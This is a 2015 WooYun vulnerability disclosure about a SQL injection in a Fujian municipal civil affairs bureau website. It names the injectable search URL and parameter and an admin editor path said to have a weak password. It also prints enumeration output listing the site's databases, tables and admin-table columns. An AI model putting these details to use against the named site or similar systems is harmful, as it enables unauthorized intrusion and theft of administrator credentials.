当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098447

漏洞标题:福建省某市民政局SQL注射(可进后台及编辑器后台弱口令)

相关厂商:福建省某市民政局

漏洞作者: 千斤拨四两

提交时间:2015-02-26 19:04

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-26: 细节已通知厂商并且等待厂商处理中
2015-03-02: 厂商已经确认,细节仅向厂商公开
2015-03-12: 细节向核心白帽子及相关领域专家公开
2015-03-22: 细节向普通白帽子公开
2015-04-01: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

注入及第三方编译器漏洞

详细说明:

http://www.smmzj.gov.cn/Article_Search.aspx?KeyWord=1&pageNow=1
available databases [21]:
[*] master
[*] model
[*] msdb
[*] QPAccountsDB
[*] QPGameMatchDB
[*] QPLandDB
[*] QPNativeWebDB
[*] QPPlatformDB
[*] QPPlatformManagerDB
[*] QPRecordDB
[*] QPTreasureDB
[*] ReportServer
[*] ReportServerTempDB
[*] smdmw
[*] SmMzDitu
[*] SmMzMap
[*] smsmzj
[*] smsylc00
[*] tempdb
[*] winiis


http://www.smmzj.gov.cn/smmzj008/htmledit/admin/default.asp


Database: smsmzj
[15 tables]
+----------------------+
| dbo.Article |
| dbo.ArticleClass |
| dbo.FriendSite |
| dbo.Guest |
| dbo.InterviewContent |
| dbo.InterviewList |
| dbo.InterviewPic |
| dbo.Message |
| dbo.OpView |
| dbo.Opinion |
| dbo.SelectItem |
| dbo.Survey |
| dbo.Unit |
| dbo.tbAdmin |
| dbo.tbDepartment |
+----------------------+


Database: smsmzj
Table: dbo.tbAdmin
[25 columns]
+----------------------+----------+
| Column | Type |
+----------------------+----------+
| AdminPurview_Article | int |
| AdminPurview_Others | nvarchar |
| ArticleDel | nvarchar |
| ArticleInputer | nvarchar |
| ArticleModify | nvarchar |
| ArticlePass | nvarchar |
| Dept_ID | int |
| Id | int |
| LastLoginIP | nvarchar |
| LastLoginTime | datetime |
| LastLogoutTime | datetime |
| LoginTimes | int |
| passed | bit |
| Password | nvarchar |
| Purview | int |
| Unit_ID | int |
| user_address | nvarchar |
| user_email | nvarchar |
| user_fax | nvarchar |
| user_phone | nvarchar |
| user_postcode | nvarchar |
| user_sex | bit |
| user_true_name | nvarchar |
| user_website | nvarchar |
| UserName | nvarchar |
+----------------------+----------+


漏洞证明:

sq.png


sq1.png


sq3.png


jjj.png


admin.png


ewew.png


修复方案:

百度慢慢修复吧

版权声明:转载请注明来源 千斤拨四两@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-03-02 15:55

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给福建分中心,由其后续协调网站管理单位处置。

最新状态:

暂无